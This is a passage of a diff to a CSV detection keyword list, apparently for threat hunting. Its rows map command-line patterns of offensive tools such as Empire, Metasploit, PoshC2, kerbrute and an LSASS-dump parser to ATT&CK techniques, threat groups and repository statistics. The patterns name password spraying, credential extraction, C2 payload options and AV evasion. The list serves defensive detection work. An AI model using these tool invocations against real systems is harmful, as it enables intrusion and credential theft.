TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "* papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" "* parrot main *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot.run/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-backports *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-security *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --password-list *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "* path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -PathToDMP *.dmp*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "* -PathToGraph *.json -PathToPayload *.exe*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* --payload CommonsCollections*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* --payload_file * --payload_path*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "* --payloadcookie *","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* --payload-file pwn.bat*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* PayloadType.BIND_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* --payload-types all*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" @@ -1493,22 +1493,22 @@ "* pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 